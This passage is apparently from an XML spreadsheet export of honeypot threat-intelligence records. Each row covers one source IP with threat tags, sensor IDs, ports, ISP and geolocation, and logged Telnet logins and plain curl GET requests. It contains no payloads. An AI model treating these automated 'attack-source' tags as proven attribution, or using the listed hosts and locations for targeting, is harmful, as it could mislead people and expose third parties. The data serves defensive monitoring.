    <n v="219"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_DNS_H44&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;53122"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Ōta"/>
    <s v="Den’enchōfu"/>
    <s v="1864381"/>
    <s v="NA"/>
    <s v="35.5955"/>
    <s v="139.665"/>
    <s v="2514"/>
    <s v="NTT PC Communications, Inc."/>
    <s v="NTT PC Communications, Inc."/>
    <s v="business"/>
    <s v="NA"/>
    <s v="1993-12-08"/>
    <s v="JPNIC-NET-JP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.sphere.ad.jp', 'ns2.sphere.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/08/31)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca11:8dca"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3411"/>
    <x v="3411"/>
    <s v="NA&amp;&amp;114-33-108-101.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T05:51:25"/>
    <d v="2023-08-17T12:01:04"/>
    <d v="2025-04-03T05:51:25"/>
    <n v="846"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;11647&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7221:6c65"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3412"/>
    <x v="3412"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:50:35"/>
    <d v="2025-04-03T05:50:35"/>
    <d v="2025-04-03T05:50:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:3c47"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3413"/>
    <x v="3413"/>
    <s v="NA&amp;&amp;220-132-187-195.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T05:47:02"/>
    <d v="2024-09-06T00:29:00"/>
    <d v="2025-04-03T05:47:02"/>
    <n v="791"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_SIP_H35&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;9100&amp;&amp;5060&amp;&amp;3306&amp;&amp;5900&amp;&amp;25&amp;&amp;32068&amp;&amp;23&amp;&amp;80&amp;&amp;8753&amp;&amp;47929&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc84:bbc3"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3414"/>
    <x v="3414"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:40:46"/>
    <d v="2024-04-16T13:32:49"/>
    <d v="2025-04-03T05:40:46"/>
    <n v="112"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;51347"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="DN"/>
    <s v="Da Nang"/>
    <s v="Sơn Trà District"/>
    <s v="Sơn Trà"/>
    <s v="8656396"/>
    <s v="NA"/>
    <s v="16.0607"/>
    <s v="108.233"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eb0:e701"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3415"/>
    <x v="3415"/>
    <s v="NA&amp;&amp;220-134-74-45.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T05:40:09"/>
    <d v="2023-07-29T21:55:15"/>
    <d v="2025-04-03T05:40:09"/>
    <n v="1164"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;61031&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80&amp;&amp;58886&amp;&amp;58838"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc86:4a2d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3416"/>
    <x v="3416"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:39:38"/>
    <d v="2025-04-03T05:39:38"/>
    <d v="2025-04-03T05:39:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fd:d46e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3417"/>
    <x v="3417"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:36:27"/>
    <d v="2024-12-15T07:11:34"/>
    <d v="2025-04-03T05:36:27"/>
    <n v="170"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Jurong East)"/>
    <s v="1880252"/>
    <s v="609606"/>
    <s v="1.32525"/>
    <s v="103.749"/>
    <s v="17547"/>
    <s v="M1 NET LTD"/>
    <s v="M1 NET LTD"/>
    <s v="business"/>
    <s v="M1 NET LTD"/>
    <s v="1987-12-01"/>
    <s v="M1NET-SG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:817e:d5dd"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3418"/>
    <x v="3418"/>
    <s v="bb42-60-108-30.singnet.com.sg&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:27:49"/>
    <d v="2023-09-11T13:54:00"/>
    <d v="2025-04-03T05:27:49"/>
    <n v="906"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;10469&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29229"/>
    <s v="103.808"/>
    <s v="9506"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="residential"/>
    <s v="Singtel Fibre"/>
    <s v="2011-02-18"/>
    <s v="SINGTEL-FIBRE-42-60-108-0"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-06-14 16:00:00"/>
    <s v="2025-06-14 16:00:00"/>
    <s v="2024-07-14 16:02:49"/>
    <s v="['ns1.singnet.com.sg', 'ns2.singnet.com.sg']"/>
    <s v="Singnet Pte Ltd"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a3c:6c1e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3419"/>
    <x v="3419"/>
    <s v="NA&amp;&amp;59-127-142-62.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T05:13:35"/>
    <d v="2024-09-10T01:08:00"/>
    <d v="2025-04-03T05:13:35"/>
    <n v="256"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;161&amp;&amp;NA&amp;&amp;60506&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:8e3e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3420"/>
    <x v="3420"/>
    <s v="NA&amp;&amp;220-132-127-176.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T05:12:55"/>
    <d v="2024-12-16T02:35:08"/>
    <d v="2025-04-03T05:12:55"/>
    <n v="530"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28"/>
